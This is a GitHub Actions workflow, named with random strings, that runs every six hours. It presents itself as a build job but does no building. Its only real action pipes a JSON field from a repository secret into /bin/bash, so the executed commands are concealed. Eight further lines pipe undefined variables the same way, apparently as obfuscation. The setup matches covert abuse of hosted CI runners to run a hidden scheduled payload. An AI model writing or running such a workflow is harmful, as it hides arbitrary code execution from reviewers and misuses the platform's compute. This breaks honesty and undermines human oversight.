name: guanzhongxian6226
on:
  workflow_dispatch:
  schedule:
    - cron: '22 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guanzhongxian6226
        env:
          ixdi334: ${{ secrets.ixdi334 }}
        run: |
          echo $ixdi334 | jq -r .q6258 | /bin/bash
          echo $xuhig44131 | jq -r .ok68276 | /bin/bash
          echo $k66 | jq -r .ofh448 | /bin/bash
          echo $qqifo8 | jq -r .gn76918 | /bin/bash
          echo $ke9 | jq -r .osgf8439 | /bin/bash
          echo $kk2841 | jq -r .xnn634 | /bin/bash
          echo $m136 | jq -r .agxf31 | /bin/bash
          echo $aukxn93739 | jq -r .nktw66 | /bin/bash
          echo $pgqs28064 | jq -r .orrbi8337 | /bin/bash

